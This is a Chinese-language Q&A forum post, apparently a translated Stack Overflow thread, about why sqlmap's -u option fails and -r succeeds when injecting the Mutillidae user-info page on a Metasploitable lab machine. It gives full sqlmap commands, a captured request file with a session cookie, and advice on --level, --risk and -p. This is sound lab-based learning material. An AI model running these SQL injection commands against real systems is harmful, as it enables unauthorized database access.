SQLmap:-u和-r命令的用法

时间:2018-05-31 07:02:25

标签: linux penetration-testing sqlmap

注意:尝试使用METASPLOITABLE的Mutillidae

我试图使用SQLmap注入mutilidae的“用户信息”页面。

我已尝试手动注入,易受攻击的参数是USERNAME和PASSWORD。

当我在SQLmap上使用-u命令时,只有参数PAGE被SQLmap视为GET参数,反过来(正如预期的那样)导致它说url不可注入。

稍后使用Burp代理并通过-r request命令运行SQLmap时,一切都可以正常使用相同的URL。

我对这两个命令如何工作以及-r命令中提供的内容感到困惑,这些命令使得成功注入的内容不在我提供的-u URL中。

我什么时候应该使用哪个命令?

使用-u命令检查漏洞

sqlmap -u http://xxx.xxx.2.9/mutillidae/index.php?page=user-info.php&username=a&password=b&user-info-php-submit-button=View+Account+Details

使用-r命令

sqlmap -r /root/Desktop/user.request

user.request包含以下内容:

GET /mutillidae/index.php?page=user-info.php&username=a&password=b&user-info-php-submit-button=View+Account+Details HTTP/1.1
Host: xxx.xxx.2.9
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://xxx.xxx.2.9/mutillidae/index.php?page=user-info.php&username=a&password=b&user-info-php-submit-button=View+Account+Details
Cookie: PHPSESSID=cb55bd05e9618af173600ba757e996c1
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Thu, 31 May 2018 06:13:15 GMT

1 个答案:

答案 0 :(得分:0)

您似乎在-u部分缺少了Cookie:

Cookie: PHPSESSID=cb55bd05e9618af173600ba757e996c1

在命令中添加以下参数:

sqlmap --headers="User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" --cookie="PHPSESSID=cb55bd05e9618af173600ba757e996c1" -u 'http://xxx.xxx.2.9/mutillidae/index.php?page=user-info.php&username=a&password=b&user-info-php-submit-button=View+Account+Details' --level=5 risk=3

级别和风险是极端的,并迫使Sqlmap几乎使用它测试客户端计算机所必需的一切...在这种特定情况下,您实际上并不需要它们,但要注意这很好。

如果要指定要让Sqlmap测试的参数,请使用-p选项 例如:

-p username

最后回答您何时使用-r vs -u的问题的第二部分,这确实是用户的选择,您可能会发现将HTTP信息转储到文件中并直接从中读取更为方便( -r)的主要用法,或者您可能会发现想要对发送的内容进行更多控制,并希望在命令行上对其进行调整(-u的主要用法)